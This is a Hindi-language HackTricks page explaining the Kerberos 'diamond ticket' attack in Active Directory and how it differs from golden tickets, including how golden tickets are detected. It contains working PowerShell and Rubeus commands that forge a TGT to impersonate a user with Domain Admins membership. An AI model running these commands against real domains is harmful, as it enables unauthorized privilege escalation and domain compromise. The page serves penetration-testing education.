8.2 KiB
डायमंड टिकट
☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥
-
क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को हैकट्रिक्स में विज्ञापित करना चाहते हैं? या क्या आपको PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करना चाहिए? सदस्यता योजनाएं की जांच करें!
-
खोजें द पीएस फैमिली, हमारा विशेष संग्रह NFTs
-
प्राप्त करें आधिकारिक PEASS और HackTricks स्वैग
-
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या मुझे ट्विटर पर फॉलो करें 🐦@carlospolopm.
-
अपने हैकिंग ट्रिक्स को हैकट्रिक्स रेपो और हैकट्रिक्स-क्लाउड रेपो में पीआर जमा करके साझा करें।
डायमंड टिकट
स्वर्ण टिकट की तरह, डायमंड टिकट एक TGT है जिसका उपयोग किसी भी सेवा में किसी भी उपयोगकर्ता के रूप में करने के लिए किया जा सकता है। स्वर्ण टिकट पूरी तरह से ऑफलाइन बनाया जाता है, इसे उस डोमेन के krbtgt हैश के साथ एन्क्रिप्ट किया जाता है, और फिर इसे उपयोग के लिए एक लॉगऑन सत्र में पास किया जाता है। क्योंकि डोमेन कंट्रोलर TGT को ट्रैक नहीं करते हैं जिन्हें वह (या वे) वैध रूप से जारी किए हैं, वे खुशी-खुशी TGT को स्वीकार करेंगे जो उसके खुद के krbtgt हैश के साथ एन्क्रिप्ट किया गया है।
स्वर्ण टिकट का उपयोग खोजने के लिए दो सामान्य तकनीकें हैं:
- उसके पास कोई संबंधित AS-REQ न होने वाले TGS-REQ खोजें।
- उसके पास मिमीकेट्ज़ की डिफ़ॉल्ट 10 वर्ष की अवधि जैसे मूर्ख मान्यताएँ रखने वाले TGT खोजें।
एक डायमंड टिकट एक DC द्वारा जारी किए गए वैध TGT के क्षेत्रों को संशोधित करके बनाया जाता है। इसे एक TGT का अनुरोध करके प्राप्त किया जाता है, डोमेन के krbtgt हैश के साथ इसे डिक्रिप्ट किया जाता है, टिकट के वांछित क्षेत्रों को संशोधित किया जाता है, और फिर इसे पुनः एन्क्रिप्ट किया जाता है। यह एक स्वर्ण टिकट की दो पहले उल्लिखित कमियों को पार करता है क्योंकि:
- TGS-REQ के पहले AS-REQ होंगे।
- TGT एक DC द्वारा जारी किया गया था, जिसका मतलब है कि यह डोमेन के केरबेरोस नीति के सभी सही विवरण रखेगा। हालांकि, ये स्वर्ण टिकट में सटीकता से जाली बनाई जा सकती हैं, यह अधिक जटिल होता है और गलतियों के लिए खुला होता है।
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid
.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512
# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.
\
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करना चाहिए? सदस्यता योजनाएं की जांच करें!
-
खोजें The PEASS Family, हमारा विशेष संग्रह NFTs
-
प्राप्त करें आधिकारिक PEASS & HackTricks swag
-
शामिल हों 💬 Discord समूह या टेलीग्राम समूह में या Twitter पर फॉलो करें 🐦@carlospolopm.
-
अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें।